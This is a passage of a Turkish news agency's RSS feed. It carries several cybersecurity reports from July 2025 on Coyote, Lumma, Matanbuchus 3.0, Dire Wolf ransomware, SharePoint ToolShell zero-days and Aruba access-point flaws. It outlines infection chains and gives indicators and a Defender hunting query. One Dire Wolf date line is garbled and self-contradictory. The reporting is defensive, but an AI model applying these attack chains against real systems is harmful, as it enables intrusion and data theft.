<p data-start="1317" data-end="1571"><strong data-start="1317" data-end="1349">Coyote zararlısının gelişimi</strong><br data-start="1349" data-end="1352">İlk kez Şubat 2024’te belgelenen Coyote, ağırlıklı olarak Brezilya merkezli bankacılık uygulamalarını hedef alıyor. Zararlı yazılımın önceki sürümleri keylogger ve sahte giriş ekranı gibi yöntemlerle veri toplamaktaydı.</p>
<p data-start="1573" data-end="1743">Yeni varyantta ise sabit hedefli uygulamalarda geleneksel yöntemler kullanılmaya devam ederken, web tarayıcısı üzerinden erişilen hizmetlerde UIA sistemi devreye giriyor.</p>
<p data-start="1745" data-end="2005"><strong data-start="1745" data-end="1791">Tarayıcı penceresi üzerinden adres tespiti</strong><br data-start="1791" data-end="1794">Coyote, kullanıcı bir bankacılık ya da kripto hizmetini tarayıcıda açtığında, pencere başlığı üzerinden tanımlama yapamazsa UIA aracılığıyla adres çubuğu veya sekme içeriğini okuyarak hedef siteyi tespit ediyor.</p>
<p data-start="2007" data-end="2232">Elde edilen bilgiler, önceden tanımlanmış 75 hizmetlik bir liste ile karşılaştırılıyor. Bu listede Banco do Brasil, CaixaBank, Banco Bradesco, Santander, Sicredi, Binance, Electrum ve Foxbit gibi finansal kurumlar yer alıyor.</p>
<p data-start="2234" data-end="2547"><strong data-start="2234" data-end="2284">Kimlik bilgisi hırsızlığına zemin hazırlanıyor</strong><br data-start="2284" data-end="2287">Şu anda yalnızca keşif aşamasında kullanılan bu yöntemle ilgili olarak, Akamai araştırmacıları UIA'nın kullanıcı tarafından girilen verileri (örneğin kullanıcı adı ve şifre) çalmak için nasıl kullanılabileceğini gösteren bir kavramsal kanıt (PoC) da yayımladı.</p>
<p data-start="2549" data-end="2755"><strong data-start="2549" data-end="2585">Microsoft henüz açıklama yapmadı</strong><br data-start="2585" data-end="2588">Microsoft’un UIA sistemi için herhangi bir güvenlik önlemi getirip getirmeyeceği belirsizliğini koruyor. Şirketle yapılan iletişim girişimlerine henüz yanıt alınamadı.</p>
<p data-start="2757" data-end="2977">Uzmanlar, Android ekosisteminde de benzer şekilde Erişilebilirlik Hizmetlerinin uzun yıllardır zararlı yazılımlar tarafından istismar edildiğine dikkat çekiyor. Google, bu konuda çeşitli güvenlik önlemleri geliştirmişti.</p>
<p data-start="2979" data-end="3165"><strong data-start="2979" data-end="2991"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Lumma zararlı yazılımı yeniden faaliyette: Altyapısını hızla toparlayarak eski seviyelerine ulaştı</title>
            <link>https://cumha.com.tr/lumma-zararli-yazilimi-yeniden-faaliyette-altyapisini-hizla-toparlayarak-eski-seviyelerine-ulasti</link>
            <guid>https://cumha.com.tr/lumma-zararli-yazilimi-yeniden-faaliyette-altyapisini-hizla-toparlayarak-eski-seviyelerine-ulasti</guid>
            <description><![CDATA[ Mayıs ayında binlerce alan adı ve sunucu altyapısının ele geçirilmesiyle büyük darbe alan Lumma infostealer zararlı yazılımı, kısa süre içinde toparlanarak yeniden aktif hale geldi. Trend Micro’nun analizlerine göre, Lumma şu anda çoklu platformlarda zararlı faaliyetlerini sürdürüyor ve eski etkinlik seviyelerine yaklaştı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ac4fd2cf4.webp" length="52246" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:35 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Lumma zararlı yazılımı nasıl geri döndü, hangi yöntemlerle bulaşıyor, hangi altyapı sağlayıcıları kullanılıyor, kolluk kuvvetlerinin müdahalesi ne ölçüde etkili oldu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="475" data-end="478">Lumma isimli infostealer (bilgi çalan) zararlı yazılımı, Mayıs ayında gerçekleştirilen geniş çaplı kolluk kuvveti operasyonunun ardından yeniden faaliyete geçti. Operasyon kapsamında 2.300 alan adı ve altyapı unsurları ele geçirilmişti.</p>
<p></p>
<p data-start="716" data-end="990">Yazılım hizmet olarak sunulan bir modelle (Malware-as-a-Service - MaaS) dağıtılan Lumma, operasyon sonrasında tamamen kapanmasa da büyük bir kesintiye uğramıştı. Haziran ayı başında yapılan analizler, Lumma faaliyetlerinin durduğunu değil, sadece yavaşladığını ortaya koydu.</p>
<p data-start="992" data-end="1203">Lumma'nın yöneticileri, XSS forumları üzerinden yaptıkları açıklamada merkezi sunucularının ele geçirilmediğini, ancak uzaktan silindiğini belirtti. Aynı mesajda, yeniden yapılanma sürecinin başladığı duyuruldu.</p>
<p data-start="1205" data-end="1494"><strong data-start="1205" data-end="1251">Siber suç çevresinde yeniden güven kazandı</strong><br data-start="1251" data-end="1254">Trend Micro tarafından yayımlanan son rapora göre, Lumma zararlı yazılımı operasyonları neredeyse eski yoğunluğuna ulaştı. Şirketin ağ telemetrisi verileri, zararlı altyapının birkaç hafta içinde yeniden etkin hale getirildiğini gösteriyor.</p>
<p data-start="1496" data-end="1682">Raporda, "Lumma Stealer ve ilişkili altyapıya yönelik kolluk kuvveti müdahalesinin ardından, Lumma'nın operasyonlarında açık bir yeniden yapılanma süreci gözlemlendi" ifadeleri yer aldı.</p>
<p data-start="1684" data-end="1950"><strong data-start="1684" data-end="1723">Yeni altyapı ve farklı sağlayıcılar</strong><br data-start="1723" data-end="1726">Lumma, geçmişte olduğu gibi yine yasal bulut altyapılarını kötüye kullanarak trafiğini gizlemeye devam ediyor. Ancak artık Cloudflare yerine, genellikle Rusya merkezli Selectel gibi alternatif sağlayıcılara yönelmiş durumda.</p>
<p data-start="1952" data-end="2099"><strong data-start="1952" data-end="1983">Dört farklı bulaşma yöntemi</strong><br data-start="1983" data-end="1986">Trend Micro uzmanları, Lumma’nın şu anda dört ana dağıtım kanalı üzerinden bulaşma gerçekleştirdiğini belirtiyor:</p>
<ul data-start="2101" data-end="3045">
<li data-start="2101" data-end="2357">
<p data-start="2103" data-end="2357"><strong data-start="2103" data-end="2150">Sahte yazılım kırma araçları ve keygen’ler:</strong> Manipüle edilmiş arama sonuçları ve sahte reklamlarla kullanıcılar, sistem bilgilerini toplayan TDS (Traffic Detection Systems) tabanlı sahte sitelere yönlendiriliyor. Ardından Lumma indiricisi sunuluyor.</p>
</li>
<li data-start="2358" data-end="2568">
<p data-start="2360" data-end="2568"><strong data-start="2360" data-end="2381">ClickFix yöntemi:</strong> Ele geçirilmiş sitelerde gösterilen sahte CAPTCHA sayfaları, kullanıcıyı PowerShell komutları çalıştırmaya yönlendiriyor. Lumma doğrudan belleğe yüklenerek tespit edilmekten kaçınıyor.</p>
</li>
<li data-start="2569" data-end="2773">
<p data-start="2571" data-end="2773"><strong data-start="2571" data-end="2600">GitHub üzerinden dağıtım:</strong> Yapay zekâ ile üretilmiş içeriklerle hazırlanan sahte oyun hileleri tanıtılıyor. Bu GitHub depolarında, genellikle "TempSpoofer.exe" gibi zararlı dosyalar barındırılıyor.</p>
</li>
<li data-start="2774" data-end="3045">
<p data-start="2776" data-end="3045"><strong data-start="2776" data-end="2800">YouTube ve Facebook:</strong> Sahte yazılımları tanıtan videolar ve paylaşımlar, kullanıcıları dış bağlantılara yönlendirerek Lumma’nın yüklendiği sitelere ulaştırıyor. Bu siteler, güvenilir platformlara benzemesi için genellikle sites.google.com gibi hizmetleri kullanıyor.</p>
</li>
</ul>
<p data-start="3047" data-end="3396"><strong data-start="3047" data-end="3089">Uzmanlara göre baskınlar yeterli değil</strong><br data-start="3089" data-end="3092">Trend Micro’nun değerlendirmesine göre, Lumma örneğinde olduğu gibi yalnızca dijital altyapıya yapılan müdahaleler, yazılım geliştiricilerini durdurmaya yetmiyor. Herhangi bir gözaltı ya da dava süreci olmaksızın yapılan operasyonlar, bu tür tehdit aktörleri tarafından geçici bir engel olarak görülüyor.</p>
<p data-start="3398" data-end="3580"><strong data-start="3398" data-end="3410"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>"IT Destek" Adı Altında Sisteminize Sızıyorlar! Matanbuchus 3.0 ile Microsoft Teams Üzerinden Gerçekleşen Tehlikeli Yeni Saldırı Yöntemi Ortaya Çıktı</title>
            <link>https://cumha.com.tr/it-destek-adi-altinda-sisteminize-siziyorlar-matanbuchus-30-ile-microsoft-teams-uzerinden-gerceklesen-tehlikeli-yeni-saldiri-yoentemi-ortaya-cikti</link>
            <guid>https://cumha.com.tr/it-destek-adi-altinda-sisteminize-siziyorlar-matanbuchus-30-ile-microsoft-teams-uzerinden-gerceklesen-tehlikeli-yeni-saldiri-yoentemi-ortaya-cikti</guid>
            <description><![CDATA[ Matanbuchus Loader’ın yeni sürümü, Microsoft Teams üzerinden yapılan sahte “IT Destek” çağrılarıyla sistemlere sızarak yalnızca RAM&#039;de çalışan ve antivirüsleri atlatan gelişmiş bir fidye yazılım saldırısına zemin hazırlıyor. Kurumlar, özellikle Quick Assist taleplerine karşı dikkatli olmalı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687dff60f2d94.webp" length="31840" type="image/webp"/>
            
            <pubDate>Mon, 21 Jul 2025 11:51:41 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Matanbuchus 3.0 nasıl çalışıyor, Microsoft Teams üzerinden nasıl yayılıyor, hangi ülkeler ve kurumlar hedefte, hangi güvenlik önlemleri alınmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<!-- Özet kutusu -->
<div style="background-color: #ffecec; border-left: 6px solid #e60000; padding: 15px; margin-bottom: 25px; border-radius: 4px;"><strong style="font-size: 18px;"> Özet:</strong><br><span style="font-size: 15px;"> Microsoft Teams üzerinden gelen sahte “IT Destek” çağrısıyla yayılan <strong>Matanbuchus 3.0</strong> zararlısı, sistemlere sızarak fidye yazılım saldırılarına zemin hazırlıyor. RAM’de çalışan, antivirüsleri atlatan ve Skype trafiği gibi davranan bu siber tehdide karşı dikkatli olun! </span></div>
<h1 style="font-size: 26px; color: #d60000; margin-bottom: 10px;">“IT Destek” Kılığında Saldırıyorlar! Matanbuchus 3.0 ile Microsoft Teams Üzerinden Siber Sızma!</h1>
<p><strong> Yeni keşfedilen Matanbuchus 3.0 zararlısı, Microsoft Teams üzerinden sahte IT destek çağrılarıyla sistemlere sızıyor.</strong> Sosyal mühendislik teknikleriyle kullanıcıları kandıran saldırganlar, zararlı yazılımı sistemlere <em>hiçbir antivirüs uyarısı olmadan</em> yerleştirmeyi başarıyor.</p>
<p>Matanbuchus Loader’ın 3. sürümü, Quick Assist ve dosya paylaşımı yoluyla sisteme sızıyor. Ardından zararlı bir <code>libcurl.dll</code> dosyası, <strong>GenericUpdater.exe</strong> üzerinden çalıştırılıyor. Bu yöntem “DLL Sideloading” olarak biliniyor ve güvenliğe takılmadan çalışabiliyor.</p>
<ul style="padding-left: 20px;">
<li>Microsoft Teams üzerinden sahte bir “IT Destek” araması yapılır</li>
<li>Kullanıcıdan Quick Assist açması istenir</li>
<li>“GenericUpdater.exe” dosyası gönderilir</li>
<li>libcurl.dll üzerinden <strong>Matanbuchus</strong> belleğe enjekte edilir</li>
<li>Arka planda sistem taraması başlar</li>
</ul>
<p>Bu saldırılar şu an aktif olarak <strong>Avrupa, ABD ve Türkiye</strong> gibi ülkelerdeki şirketleri hedef alıyor. Özellikle Microsoft Teams kullanan kurumlar, devlet yapıları ve uzaktan çalışanlar tehdit altında.</p>
<ul style="padding-left: 20px;">
<li><strong>Diskte iz bırakmadan</strong> sadece RAM’de çalışır</li>
<li><strong>EDR atlatır</strong> – dolaylı sistem çağrıları kullanır</li>
<li><strong>Sistem konfigürasyonunu</strong> MurmurHash3 ve Salsa20 ile şifreli saklar</li>
<li><strong>Skype trafiği gibi davranarak</strong> C2 sunucusuna veri gönderir</li>
<li>PowerShell, CMD, MSI installer ve WMI gibi yöntemlerle farklı şekillerde tetiklenebilir</li>
</ul>
<ul style="padding-left: 20px;">
<li>Teams çağrılarını kimden geldiğine bakmadan kabul etmeyin</li>
<li>Quick Assist isteklerini reddedin, teyitsiz bağlantı kurmayın</li>
<li>“GenericUpdater.exe” gibi belirsiz dosyaları çalıştırmayın</li>
<li>EDR sistemlerinizi güncel tutun, davranışsal analiz desteği olan çözümler kullanın</li>
<li>PowerShell ve CMD komutlarına kısıtlama getirin</li>
</ul>
<!-- Kapanış -->
<p style="background-color: #fdf0d5; border-left: 5px solid #ff9800; padding: 15px; margin-top: 30px; font-size: 15px;"><strong>Unutmayın:</strong> Güvenli görünen araçlar (Teams, Quick Assist) bile saldırganlar tarafından suistimal edilebilir. Her çağrıya ve dosyaya şüpheyle yaklaşın. Bu saldırı şimdi aktif. Tehdit kapınızda olabilir!</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft SharePoint sistemlerinde tespit edilen iki yeni sıfır gün açığı için acil yama yayınladı</title>
            <link>https://cumha.com.tr/microsoft-sharepoint-sistemlerinde-tespit-edilen-iki-yeni-sifir-gun-acigi-icin-acil-yama-yayinladi</link>
            <guid>https://cumha.com.tr/microsoft-sharepoint-sistemlerinde-tespit-edilen-iki-yeni-sifir-gun-acigi-icin-acil-yama-yayinladi</guid>
            <description><![CDATA[ Microsoft, SharePoint sunucularını hedef alan &quot;ToolShell&quot; saldırılarında kullanılan ve daha önceki yamaları atlatan iki kritik güvenlik açığına karşı acil güncelleme yayınladı. Güncellemelerin ardından sistem yöneticilerinin makine anahtarlarını döndürmesi ve log dosyalarını kontrol etmesi tavsiye ediliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687dfb0cbe629.webp" length="49782" type="image/webp"/>
            
            <pubDate>Mon, 21 Jul 2025 11:35:44 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>SharePoint güncellemeleri hangi açıkları kapatıyor, hangi sürümler için yamalar yayınlandı, sistem yöneticileri hangi adımları izlemeli, saldırılardan kaç kurum etkilendi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h1 style="color: #b30000;">Microsoft SharePoint için Acil Güvenlik Güncellemeleri Yayınlandı</h1>
<p>Microsoft, SharePoint yazılımında tespit edilen ve dünya genelinde aktif olarak kötüye kullanılan iki sıfır gün (zero-day) açığı için acil güvenlik güncellemeleri yayınladı. Açıklar, <strong>CVE-2025-53770</strong> ve <strong>CVE-2025-53771</strong> kodlarıyla takip ediliyor.</p>
<h2 style="color: #004080;">ToolShell Saldırı Zinciri ve Pwn2Own Yarışması</h2>
<p>Mayıs ayında Berlin'de düzenlenen Pwn2Own güvenlik yarışmasında araştırmacılar, <strong>"ToolShell"</strong> olarak adlandırılan bir güvenlik zafiyeti zinciri aracılığıyla Microsoft SharePoint üzerinde uzaktan kod çalıştırma (RCE) gerçekleştirmeyi başarmıştı.</p>
<p>Bu zafiyetler Temmuz ayındaki Patch Tuesday kapsamında yamalanmış olsa da, saldırganlar bu güncellemeleri atlatan yeni açıklar keşfetti. Şu ana kadar dünya genelinde <strong>en az 54 kurum</strong> bu saldırılardan etkilenmiş durumda.</p>
<h2 style="color: #004080;">Yayınlanan Güncellemeler</h2>
<p>Microsoft, SharePoint Subscription Edition ve SharePoint Server 2019 için CVE-2025-53770 ve CVE-2025-53771 açıklarını gideren acil yamaları paylaştı. SharePoint Server 2016 için ise yamaların <span style="color: red;">henüz hazır olmadığı</span> bildirildi.</p>
<ul style="background-color: #f2f2f2; padding: 15px; border-left: 5px solid #007acc;">
<li><strong>SharePoint Server 2019:</strong> <code>KB5002754</code></li>
<li><strong>SharePoint Subscription Edition:</strong> <code>KB5002768</code></li>
</ul>
<h2 style="color: #004080;">Makine Anahtarlarının Döndürülmesi Gerekiyor</h2>
<p>Güncellemeden sonra SharePoint sistemlerindeki makine anahtarlarının döndürülmesi öneriliyor. Bu işlem iki şekilde yapılabiliyor:</p>
<ol>
<li><strong>PowerShell ile:</strong> <code>Update-SPMachineKey</code></li>
<li><strong>Merkezi Yönetim Arayüzü:</strong> Central Administration → Monitoring → Review job definition → <em>Machine Key Rotation Job</em> → <strong>Run Now</strong></li>
</ol>
<p>İşlem sonrası tüm SharePoint sunucularında <code>iisreset.exe</code> komutu ile IIS yeniden başlatılmalı.</p>
<h2 style="color: #004080;">Kötü Amaçlı Dosya Belirtileri Kontrol Edilmeli</h2>
<p>Microsoft, sistemlerde saldırıya işaret edebilecek dosya ve log girdilerinin incelenmesini öneriyor. Aşağıdaki bulgulara dikkat edilmelidir:</p>
<ul style="background-color: #fff8e1; padding: 15px; border-left: 5px solid #ffa500;">
<li><code>C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx</code> adlı dosyanın varlığı</li>
<li><code>ToolPane.aspx</code> dosyasına yapılan POST istekleri</li>
<li><code>SignOut.aspx</code> referanslı HTTP log girdileri</li>
</ul>
<h3 style="color: #006600;">Defender ile Tespit Sorgusu:</h3>
<pre style="background-color: #f4f4f4; padding: 10px; overflow-x: auto; border: 1px solid #ccc;">DeviceFileEvents
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS"
| where FileName =~ "spinstall0.aspx"
   or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
          FileName, FolderPath, ReportId, ActionType, SHA256
| order by Timestamp desc
    </pre>
<p>Eğer dosya tespit edilirse, etkilenen sunucuda ve bağlı sistemlerde geniş çaplı bir güvenlik analizi yapılması gerekmektedir.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni Siber Tehdit: Dire Wolf Ransomware 500 Bin Dolarla Vuruyor!</title>
            <link>https://cumha.com.tr/yeni-siber-tehdit-dire-wolf-ransomware-500-bin-dolarla-vuruyor</link>
            <guid>https://cumha.com.tr/yeni-siber-tehdit-dire-wolf-ransomware-500-bin-dolarla-vuruyor</guid>
            <description><![CDATA[ Dire Wolf ransomware grubu, 2025&#039;te ortaya çıkarak 11 ülkede 16 kurumu hedef aldı. Kişiye özel fidye notları ve 500.000$ taleplerle dikkat çeken grup, gelişmiş şifreleme teknikleriyle öne çıkıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687d2cd143290.webp" length="42846" type="image/webp"/>
            
            <pubDate>Sun, 20 Jul 2025 20:52:27 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>dire wolf grubu, fidye yazılımlarında yeni bir dönemi başlatıyor olabilir. yüksek kazanç odaklı, hedefe özel ve psikolojik baskı gücü yüksek yapılarıyla dikkat çekiyorlar.</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h1 style="color: #b71c1c; font-size: 28px; font-weight: bold; margin-bottom: 16px;"> Yeni Siber Tehdit: Dire Wolf Ransomware 500 Bin Dolarla Şirketleri Vuruyor!</h1>
<p style="font-size: 16px;"><br>Mayıs 2025’te siber güvenlik uzmanlarının keşfettiği <strong>Dire Wolf fidye yazılımı grubu</strong>, şimdiden <strong>11 ülkede 16 kurumu</strong> hedef aldı. Grup, kurbanlarına özel notlar bırakıp kişisel iletişim kurarak ortalama <strong>500 bin dolarlık fidyeler</strong> talep ediyor.</p>
<p style="font-size: 16px;">Grup ilk kez <strong>Mayıs 2025Haziran-Temmuz 2025</strong> arasında Türkiye'den kaynaklandı.</p>
<p style="font-size: 16px;">Saldırılar; <strong>ABD, Tayland, Türkiye</strong> gibi toplam 11 ülkeyi kapsıyor. En çok hedef alınan sektörler ise <strong>teknoloji</strong> ve <strong>üretim</strong> alanında faaliyet gösteren şirketler.</p>
<p style="font-size: 16px;">Dire Wolf, <em>double extortion</em> yani <strong>çifte sömürü</strong> yöntemi kullanıyor. Verileri hem şifreliyor hem de çalıyor. Saldırılarında şu teknikleri uyguluyor:</p>
<ul style="margin-left: 20px;">
<li>Golang ile yazılmış fidye yazılımı</li>
<li>UPX ile paketlenmiş, analizi zor</li>
<li><strong>Curve25519</strong> + <strong>ChaCha20</strong> şifreleme</li>
<li>75 sistem servis ve 59 uygulamayı durdurma</li>
<li>Antivirüsleri etkisizleştirme (Sophos, Symantec, vb.)</li>
<li>Windows loglarını ve geri yükleme noktalarını silme</li>
</ul>
<p style="font-size: 16px;"><strong></strong><br>Dire Wolf’un amacı <strong>sadece para kazanmak</strong>. Grup herhangi bir politik mesaj vermiyor. Yüksek fidye talepleriyle <strong>"az ama öz saldırı" stratejisi</strong> izliyor. Uzmanlara göre bu taktik, <strong>İsrail’in nokta atışı operasyonlarına benzer</strong> biçimde profesyonelce yürütülüyor.</p>
<p style="font-size: 16px;">Grubun kimliği henüz bilinmiyor. Ancak kurbanlara özel yazışmalar yapmaları, ileri düzey <strong>sosyal mühendislik bilgisine</strong> sahip olduklarını gösteriyor. Her kuruma özel notlar ve doğrudan iletişim kanalları oluşturuluyor.</p>
<h2 style="color: #1565c0; font-size: 20px;"> Kurumlar Ne Yapmalı?</h2>
<ul style="margin-left: 20px; font-size: 16px;">
<li>Yedekleri offline ortamda saklayın</li>
<li>Antivirüs sistemlerini güncel tutun</li>
<li>Şüpheli e-postalara karşı personeli eğitin</li>
<li>Sistem loglarını izleyin</li>
<li>Geri yükleme noktalarını koruyun</li>
</ul><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>HPE, Aruba erişim noktalarında kritik güvenlik açığı uyarısı yaptı: Saldırganlar cihazlara yönetici olarak sızabilir</title>
            <link>https://cumha.com.tr/hpe-aruba-erisim-noktalarinda-kritik-guvenlik-acigi-uyarisi-yapti-saldirganlar-cihazlara-yoenetici-olarak-sizabilir</link>
            <guid>https://cumha.com.tr/hpe-aruba-erisim-noktalarinda-kritik-guvenlik-acigi-uyarisi-yapti-saldirganlar-cihazlara-yoenetici-olarak-sizabilir</guid>
            <description><![CDATA[ Hewlett-Packard Enterprise (HPE), Aruba Instant On erişim noktalarında bulunan ve yönetici erişimini mümkün kılan sabitlenmiş kimlik bilgileri nedeniyle kullanıcıları acil yazılım güncellemesine çağırdı. Kritik seviyede değerlendirilen zafiyet, uzaktan erişimle cihazların tam kontrolünü ele geçirme riski taşıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687d1226db5d4.webp" length="43456" type="image/webp"/>
            
            <pubDate>Sun, 20 Jul 2025 18:58:46 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Aruba erişim noktalarında hangi güvenlik açıkları tespit edildi, sabitlenmiş giriş bilgileri ne tür riskler oluşturuyor, komut enjeksiyonu zafiyeti nasıl kullanılabilir, kullanıcılar bu açıklara karşı ne yapmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="483" data-end="486">Hewlett-Packard Enterprise (HPE), küçük ve orta ölçekli işletmelere yönelik geliştirilen Aruba Instant On kablosuz erişim noktalarında tespit edilen kritik bir güvenlik açığına karşı kullanıcıları uyardı.</p>
<p></p>
<p data-start="692" data-end="1017"><em data-start="692" data-end="708">CVE-2025-37103</em> olarak takip edilen bu açık, ürünlerde sabitlenmiş (hardcoded) yönetici giriş bilgilerinin bulunduğunu ortaya koyuyor. HPE tarafından yayımlanan güvenlik bültenine göre, saldırganlar bu bilgiler aracılığıyla kimlik doğrulama süreçlerini atlayabiliyor ve cihazların web arayüzüne yönetici olarak erişebiliyor.</p>
<p data-start="1019" data-end="1223">Açığın etkililik seviyesi <em data-start="1045" data-end="1053">kritik</em> olarak tanımlandı ve <em data-start="1075" data-end="1086">CVSS v3.1</em> puanı 9.8 olarak belirlendi. Zafiyet, <em data-start="1125" data-end="1153">3.2.0.1 ve daha eski sürüm</em> yazılımları çalıştıran Instant On Access Point modellerini etkiliyor.</p>
<p data-start="1225" data-end="1474">HPE bülteninde şu ifadeye yer verdi:<br data-start="1261" data-end="1264">“Yazılıma gömülü giriş bilgilerinin varlığı, cihazlara kimlik doğrulama olmaksızın erişim sağlanmasına yol açmaktadır. Bu da uzaktaki bir saldırganın sistemi yönetici yetkileriyle kontrol etmesine imkan tanır.”</p>
<p data-start="1476" data-end="1659">Bu zafiyetin keşfi, Ubisectech Sirius Team üyesi ve <em data-start="1528" data-end="1532">ZZ</em> takma adını kullanan bir güvenlik araştırmacısı tarafından gerçekleştirildi. Araştırmacı bulgularını doğrudan HPE’ye bildirdi.</p>
<p data-start="1661" data-end="1936">Saldırganların yönetici erişimi elde ettikten sonra erişim noktası ayarlarını değiştirebileceği, güvenlik yapılandırmalarını etkileyebileceği, arka kapılar kurabileceği, ağ trafiğini izleyerek gizli dinleme yapabileceği veya daha ileri sistemlere sızabileceği ifade ediliyor.</p>
<p data-start="1938" data-end="2297"><strong data-start="1938" data-end="2000">İkinci açık CLI üzerinden komut enjeksiyonuna izin veriyor</strong><br data-start="2000" data-end="2003">Aynı güvenlik bülteninde, HPE tarafından <em data-start="2044" data-end="2060">CVE-2025-37102</em> koduyla bildirilen ikinci bir zafiyet daha yer aldı. Bu açık, Aruba Instant On cihazlarının komut satırı arayüzünde (CLI) bulunan ve kimlik doğrulaması gerektiren yüksek seviyede tehlikeli bir komut enjeksiyonu zafiyetine işaret ediyor.</p>
<p data-start="2299" data-end="2614">Uzmanlara göre, bu açık birinci zafiyetle zincirleme kullanılabilir. Yani saldırganlar önce sabitlenmiş bilgilerle yönetici erişimi elde edip, ardından CLI üzerinden zararlı komutlar yürütebilir. Bu durum veri sızdırma, güvenlik bileşenlerini devre dışı bırakma ve kalıcı erişim sağlama gibi sonuçlara yol açabilir.</p>
<p data-start="2616" data-end="2779">Her iki zafiyetin çözümü için, cihazların <em data-start="2658" data-end="2682">3.2.1.0 veya daha yeni</em> bir yazılım sürümüne güncellenmesi gerektiği belirtildi. HPE, herhangi bir geçici çözüm sunmadı.</p>
<p data-start="2781" data-end="3007">Şirket, şu ana kadar bu açıklardan yararlanıldığına dair herhangi bir kötüye kullanım bildirimi almadığını ifade etti. Ancak, durumun hızla değişebileceği ve güvenlik yamalarının derhal uygulanmasının önem taşıdığı vurgulandı.</p>
<p data-start="3009" data-end="3237"><strong data-start="3009" data-end="3021"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft SharePoint sıfır gün açığı saldırılarda kullanılıyor: 29 kuruma sızıldı, yama henüz yayımlanmadı</title>
            <link>https://cumha.com.tr/microsoft-sharepoint-sifir-gun-acigi-saldirilarda-kullaniliyor-29-kuruma-sizildi-yama-henuz-yayimlanmadi</link>
            <guid>https://cumha.com.tr/microsoft-sharepoint-sifir-gun-acigi-saldirilarda-kullaniliyor-29-kuruma-sizildi-yama-henuz-yayimlanmadi</guid>
            <description><![CDATA[ Microsoft, SharePoint Server yazılımında tespit edilen ve halen aktif şekilde istismar edilen kritik bir sıfır gün açığına karşı uyarıda bulundu. CVE-2025-53770 kodlu açıklık için henüz güvenlik güncellemesi bulunmuyor; dünya genelinde 85&#039;ten fazla sunucunun ele geçirildiği ve aralarında çok uluslu şirketler ile kamu kurumlarının da olduğu 29 kuruma sızıldığı bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687d119577e01.webp" length="57564" type="image/webp"/>
            
            <pubDate>Sun, 20 Jul 2025 18:57:38 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft SharePoint sıfır gün açığı nasıl çalışıyor, hangi kurumlar saldırılardan etkilendi, geçici güvenlik önlemleri neler, hangi sistemler risk altında bulunuyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="532" data-end="535">Microsoft, SharePoint Server ürününde bulunan ve aktif olarak istismar edilen kritik bir sıfır gün güvenlik açığını duyurdu. <em data-start="660" data-end="676">CVE-2025-53770</em> koduyla takip edilen açık, yerel sunucularda çalışan SharePoint sistemlerini etkiliyor. Microsoft 365 hizmeti bu açıklıktan etkilenmiyor.</p>
<p></p>
<p data-start="816" data-end="1155">Söz konusu zafiyet, daha önce <em data-start="846" data-end="867">Pwn2Own Berlin 2025</em> etkinliğinde gösterilen ve "ToolShell" olarak adlandırılan saldırı zincirinin bir varyantı olarak değerlendiriliyor. Orijinal zincirde yer alan <em data-start="1012" data-end="1028">CVE-2025-49706</em> ve <em data-start="1032" data-end="1048">CVE-2025-49704</em> kodlu açıklıklar Temmuz yamasıyla kapatılmış olsa da, benzer bir teknikle çalışan yeni açık tespit edildi.</p>
<p data-start="1157" data-end="1445">Microsoft’un açıklamasına göre, saldırganlar bu zafiyet yoluyla sunucuya bir <code data-start="1234" data-end="1241">.aspx</code> dosyası yükleyerek uzaktan kod çalıştırma (RCE) gerçekleştirebiliyor. Bu işlem sırasında, SharePoint sunucusuna ait kriptografik anahtarlar ele geçirilerek sistem üzerinde yetkili işlemler yapılabiliyor.</p>
<p data-start="1447" data-end="1817"><strong data-start="1447" data-end="1500">85'ten fazla sunucu tehlikede, 29 kurum etkilendi</strong><br data-start="1500" data-end="1503">Saldırı ilk olarak Hollanda merkezli siber güvenlik firması <em data-start="1563" data-end="1577">Eye Security</em> tarafından 18 Temmuz’da fark edildi. Firmanın açıklamasına göre, saldırılarda “spinstall0.aspx” adlı zararlı bir dosya kullanılarak SharePoint sunucularının yapılandırma dosyalarındaki ValidationKey ve DecryptionKey bilgileri sızdırılıyor.</p>
